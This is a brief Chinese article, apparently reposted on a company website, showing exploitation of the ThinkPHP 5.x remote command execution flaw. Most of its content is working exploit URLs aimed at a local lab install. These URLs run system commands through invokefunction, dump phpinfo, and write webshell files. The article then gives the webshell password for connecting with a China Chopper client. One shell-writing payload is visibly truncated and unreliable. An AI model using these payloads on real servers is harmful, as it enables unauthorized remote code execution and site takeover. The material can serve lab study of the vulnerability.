thinkphp_5x_命令执行漏洞的示例分析

这篇文章主要介绍thinkphp_5x_命令执行漏洞的示例分析,文中介绍的非常详细,具有一定的参考价值,感兴趣的小伙伴们一定要看完!

成都创新互联从2013年成立,先为峨山县等服务建站,峨山县等地企业,进行企业商务咨询服务。为峨山县企业网站制作PC+手机+微官网三网同步一站式服务解决您的所有建站问题。

thinkphp_5x_命令执行漏洞

受影响版本包括5.0和5.1版本

docker漏洞环境源码:
https://github.com/vulnspy/thinkphp-5.1.29
本地环境搭建:
thinkphp5.0.15+php5.6n+ apache2.0
http://www.thinkphp.cn/donate/download/id/1125.html

利用system函数远程命令执行

EXP
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

通过phpinfo函数写出phpinfo()信息

EXP:
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

写入shell

http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^>shell.php

或者

http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=FUCK

使用菜刀连接
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/shell.php   密码为zane

http://127.0.0.1/middleware/thinkphp_5.0.15_full/test.php        密码为zane

以上是“thinkphp_5x_命令执行漏洞的示例分析”这篇文章的所有内容,感谢各位的阅读!希望分享的内容对大家有帮助,更多相关知识,欢迎关注创新互联行业资讯频道!


文章题目:thinkphp_5x_命令执行漏洞的示例分析
转载来源:http://bzwzjz.com/article/psgepc.html

其他资讯

Copyright © 2007-2020 广东宝晨空调科技有限公司 All Rights Reserved 粤ICP备2022107769号
友情链接: 成都网站建设公司 营销网站建设 温江网站设计 成都网站设计 网站制作公司 成都商城网站建设 成都定制网站建设 外贸网站建设 网站制作 重庆网站制作 成都网站建设 手机网站制作 网站建设改版 定制网站建设多少钱 网站设计制作 网站制作 成都网站设计制作公司 营销型网站建设 成都商城网站建设 网站建设 网站建设推广 LED网站设计方案